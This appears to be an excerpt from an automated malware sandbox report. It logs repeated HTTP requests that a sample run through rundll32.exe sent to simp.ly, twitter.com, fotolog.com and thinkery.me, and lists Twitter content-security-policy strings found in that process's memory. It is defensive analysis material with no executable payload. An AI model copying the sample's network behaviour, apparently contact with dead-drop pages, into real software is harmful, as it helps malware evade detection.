Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: rundll32.exe, 00000002.00000003.423757010.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.411842354.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: .tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnap equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmpString found in binary or memory: /vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.411842354.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: 7wimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.pd equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.543376737.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: ://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmpString found in binary or memory: ://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https: equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmpString found in binary or memory: ; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytic equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmpString found in binary or memory: alytics.com https://app.app.simplenote.comapp.simplenote.com/vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.367356640.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: amaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MzZkMDU4ODctNjgyNC00ZmI4LWFlMTYtZGJlN2Q2MWY1Yjk2'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.421030454.000001DEA8579000.00000004.00000001.sdmpString found in binary or memory: blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-ZjNkYzhiZTItNDE4Ny00MDdhLTk0YzQtNjA0NmM0ZWM2Nc equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net h equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.350076633.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net h equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.450046492.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https:/ equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.423757010.000001DEAA276000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.338412221.000001DEA855C000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.426876801.000001DEA8573000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-M2Q2ZGFmMjMtZTU5ZC00NWFmLWE5YmItNGI2ZThhMmEwZWQy'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.508677476.000001DEAA295000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MDYxZWVjZjUtZjY5NC00MWY3LTg3NWMtZjc0ODhkMTBmYWZj'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
